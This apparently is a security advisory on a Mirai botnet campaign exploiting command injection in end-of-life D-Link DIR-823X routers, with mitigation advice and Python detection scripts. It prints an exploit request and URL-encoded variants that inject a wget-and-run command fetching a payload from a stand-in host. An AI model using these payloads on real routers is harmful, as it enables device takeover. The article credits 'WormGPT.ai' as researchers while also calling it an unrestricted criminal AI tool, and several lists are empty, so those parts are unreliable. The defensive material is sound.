Mirai Botnet Exploits RCE Flaw in EoL D-Link Routers: CVE-2025-29635

Published 2026-04-28 · Category: cybersecurity

New Mirai campaign targets CVE-2025-29635, a command-injection flaw in EoL D-Link DIR-823X routers. Learn how to protect your network from this botnet threat.



Key Takeaways

Introduction: The Resurgence of Mirai

The infamous Mirai botnet—first unleashed in 2016—continues to evolve, targeting unpatched IoT devices with alarming efficiency. In April 2026, researchers at WormGPT.ai identified a new campaign exploiting CVE-2025-29635, a command-injection vulnerability in D-Link DIR-823X routers. These routers, declared end-of-life (EoL) in 2023, no longer receive security updates, leaving millions of devices vulnerable to remote takeover.

This campaign highlights a persistent challenge in IoT defense: end-of-life devices never receive fixes, typically cannot run host-based protection, and are frequently reachable from the internet, which makes them prime targets for self-propagating malware that needs no human operator once a working exploit exists.

Technical Breakdown of CVE-2025-29635

Vulnerability Details

The flaw resides in the `/goform/setAutoUpgrade` endpoint of the DIR-823X firmware. The `day` parameter of a POST request is passed into a system command without sanitization, so a value containing a shell metacharacter such as `;` terminates the intended command and runs whatever follows it. For example:

```http
POST /goform/setAutoUpgrade HTTP/1.1
Host: [target IP]
Content-Type: application/x-www-form-urlencoded

day=1;wget http://malicious-server.com/mirai.sh -O /tmp/mirai.sh;sh /tmp/mirai.sh
```

How the Exploit Works

1. Scanning: The Mirai variant scans the internet for DIR-823X routers with an exposed web interface (typically port 80 or 8080).
2. Exploitation: It sends the malicious HTTP request to the vulnerable endpoint, which does not require authentication.
3. Payload Delivery: The injected command downloads a shell script that fetches the Mirai binary from a command-and-control (C2) server.
4. Botnet Enrollment: The infected device becomes part of the botnet, capable of launching DDoS attacks, exfiltrating data, or scanning for other vulnerable devices.

The Role of Dark Web AI in Modern Botnets

This campaign is a stark example of how dark web AI tools are lowering the barrier for cybercriminals. Platforms like WormGPT.ai offer unrestricted AI models that can generate exploit code, craft phishing emails, and even optimize malware payloads. While these tools are designed for ethical security research, they are increasingly abused by threat actors.

For instance, AI phishing campaigns now use large language models (LLMs) to create convincing lures that trick administrators into clicking malicious links. Similarly, AI penetration testing tools can automate the discovery of vulnerabilities like CVE-2025-29635, accelerating the attack lifecycle.

The Convergence of AI and Malware

Impact and Scale of the Campaign

According to Shodan scans, over 1.2 million D-Link DIR-823X routers are still online and potentially vulnerable. The campaign has already infected an estimated 50,000 devices in the past two weeks, with the botnet's size growing daily. Notable targets include:

The botnet's primary activities include:
- DDoS attacks, both application-layer (Layer 7) HTTP floods and volumetric DNS amplification
- Credential harvesting via man-in-the-middle attacks on traffic passing through the compromised router
- Proxy services for anonymizing other criminal activities

Mitigation Strategies for Security Teams

Since D-Link has not released patches for EoL devices, security teams must adopt a defense-in-depth approach:

1. Replace or Isolate EoL Routers
- **Immediate action**: Replace DIR-823X routers with supported models. If replacement is not feasible, segment them on a separate VLAN with strict firewall rules.
- **Disable remote management**: Block access to the router's admin interface from the internet. The vulnerable endpoint is part of that web interface, so WAN-side exposure is what makes the device remotely exploitable.

2. Network-Level Protections
- **Intrusion prevention systems (IPS)**: Deploy signatures for the exploit pattern (`POST /goform/setAutoUpgrade` whose `day` value is anything other than a short integer). Match on the decoded parameter value rather than on a literal `;`, because attackers URL-encode metacharacters (`%3B`) to slip past naive string matches.
- **DNS filtering**: Block known C2 and payload-hosting domains associated with the Mirai variant, and alert on the lookups themselves, since a blocked resolution attempt from a router IP is an infection indicator in its own right.
- **Rate limiting**: Limit outbound traffic from IoT segments so that compromised routers cannot contribute meaningful DDoS volume or scan the internet at speed.
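The following detector is an added example, not code from the original article or from D-Link: it parses raw HTTP requests (constructed samples, including the request shown in the Technical Breakdown and a URL-encoded variant of it) and flags any POST to `/goform/setAutoUpgrade` whose `day` value is not a short integer. The expectation that `day` is a one- or two-digit number is an assumption; the IP addresses and payload URLs are made up. A naive literal-`;` signature is included alongside to show why matching on the decoded value matters.

```python
"""Flag CVE-2025-29635 exploitation attempts in captured HTTP requests.

Added example (not code from the article or from D-Link). The endpoint and
parameter name come from the vulnerability description; the sample requests
and addresses below are constructed. Assumption: a legitimate ``day`` value
is a short integer, so anything else is treated as an exploit attempt.
"""
import re
from urllib.parse import unquote_plus

VULN_PATH = "/goform/setAutoUpgrade"
EXPECTED_DAY = re.compile(r"^\d{1,2}$")        # assumed legitimate format
SHELL_META = re.compile(r"[;|&`\n\r<>]|\$\(")  # common shell injection tokens


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target.split("?", 1)[0],
            "headers": headers, "body": body}


def parse_form(body: str) -> dict:
    """Decode application/x-www-form-urlencoded; only '&' separates fields.

    Treating ';' as a separator too (as some libraries once did) would split
    the payload off and leave a clean-looking day=1.
    """
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def naive_signature(raw: str) -> bool:
    """A literal-string IPS rule: fires only if ';' appears undecoded."""
    return VULN_PATH in raw and ";" in raw


def classify(raw: str) -> tuple:
    """Return (verdict, reason) for one raw request."""
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"] != VULN_PATH:
        return ("ignore", "not the vulnerable endpoint")
    day = parse_form(req["body"]).get("day", "")
    if EXPECTED_DAY.match(day):
        return ("allow", "day is a plain integer")
    if SHELL_META.search(day):
        return ("alert", "shell metacharacter in day=%r" % day)
    return ("alert", "unexpected day value %r" % day)


_HEAD = ("POST /goform/setAutoUpgrade HTTP/1.1\r\nHost: 192.0.2.1\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n\r\n")

# Constructed sample traffic (not real captures).
SAMPLES = {
    "benign": _HEAD + "day=3&hour=2",
    "plain_injection": _HEAD + "day=1;wget http://malicious-server.com/mirai.sh"
                               " -O /tmp/mirai.sh;sh /tmp/mirai.sh",
    "encoded_injection": _HEAD + "day=1%3Bwget+http%3A%2F%2F198.51.100.7%2Fm.sh"
                                 "+-O+%2Ftmp%2Fm.sh%3Bsh+%2Ftmp%2Fm.sh",
    "other_endpoint": "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        verdict, reason = classify(raw)
        print(f"{name:18} naive={naive_signature(raw)!s:5} {verdict:6} {reason}")
```

The encoded variant carries no literal `;` anywhere in the request, so the naive rule stays silent while the decoded-value check still alerts; an allowlist on what the firmware legitimately accepts also catches injection tokens the metacharacter regex does not list.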

3. Monitoring and Threat Hunting
- **Log analysis**: Monitor for unusual outbound connections from router IPs, for example to unfamiliar hosts on non-standard ports or file downloads from bare IP addresses.
- **AI-driven detection**: Use machine learning models to identify botnet behavior, such as periodic beaconing or sudden traffic spikes; simple statistical baselines on inter-connection timing already catch the obvious cases.
- **Honeypots**: Expose decoys that emulate the DIR-823X web interface to capture exploit attempts and payload URLs for threat intelligence.
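As an added example (not from the original article), the script below runs two hunting heuristics over a constructed flow log from an IoT VLAN: near-constant spacing between connections from one source to one external host (C2 beaconing) and fan-out from one source to many hosts on a single port (the scanning step of the infection chain). The addresses, port numbers and thresholds are assumptions to tune for a real network.

```python
"""Hunt for Mirai-style behaviour in flow logs from the IoT/router VLAN.

Added example, not code from the original article. Flow records, addresses
and thresholds below are constructed assumptions, not real data.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow log: (epoch seconds, src, dst, dst port).
FLOWS = []
# 10.20.0.5 (the router) beacons to 203.0.113.9:6667 roughly every 60 s.
for i, jitter in enumerate([0, 1, -1, 0, 2, -1, 0, 1]):
    FLOWS.append((1_700_000_000 + 60 * i + jitter, "10.20.0.5", "203.0.113.9", 6667))
# The same router probes 25 external hosts on port 80 within 25 s.
for i in range(25):
    FLOWS.append((1_700_000_100 + i, "10.20.0.5", f"198.51.100.{i + 1}", 80))
# A laptop browses irregularly: neither periodic nor fanning out.
for t in (1_700_000_005, 1_700_000_017, 1_700_000_140, 1_700_000_143, 1_700_000_399):
    FLOWS.append((t, "10.20.0.42", "192.0.2.80", 443))


def find_beacons(flows, min_count=5, max_cv=0.1):
    """Return (src, dst, port, period_s) for connections with near-constant spacing."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)
    hits = []
    for key, stamps in by_pair.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        # Coefficient of variation: human traffic is bursty, bots are metronomic.
        if period > 0 and pstdev(gaps) / period <= max_cv:
            hits.append((*key, round(period)))
    return hits


def find_scanners(flows, window_s=60, min_targets=20):
    """Return (src, port, n_targets) for sources contacting many hosts on one port."""
    by_src_port = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src_port[(src, port)].append((ts, dst))
    hits = []
    for (src, port), events in by_src_port.items():
        events.sort()
        best = 0
        # For each start point, count distinct destinations inside the window.
        for i, (t0, _) in enumerate(events):
            seen = {d for t, d in events[i:] if t - t0 <= window_s}
            best = max(best, len(seen))
        if best >= min_targets:
            hits.append((src, port, best))
    return hits


if __name__ == "__main__":
    for src, dst, port, period in find_beacons(FLOWS):
        print(f"beacon: {src} -> {dst}:{port} every ~{period}s")
    for src, port, n in find_scanners(FLOWS):
        print(f"scanner: {src} hit {n} distinct hosts on port {port}")
```

Feed it real NetFlow or firewall logs restricted to the IoT VLAN and the two heuristics become the first-pass triage before any heavier model: the router in the sample is flagged on both counts while the laptop's bursty browsing is not.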

4. User Awareness
- **Phishing training**: Educate users about AI-generated phishing lures that may target network administrators.
- **Password hygiene**: Ensure all devices use strong, unique passwords. This does not mitigate CVE-2025-29635 itself, which is exploited without credentials, but it closes the default-credential telnet vector Mirai has relied on since 2016.

What This Means for Security Teams

The exploitation of CVE-2025-29635 underscores a critical lesson: end-of-life devices are ticking time bombs. As IoT deployments grow, so does the attack surface for autonomous malware like Mirai. Security teams must:

In the age of AI-powered cybercrime, the line between offense and defense blurs. By adopting a proactive, AI-enhanced security posture, organizations can turn the tables on botnets like Mirai—before they turn your routers into weapons.
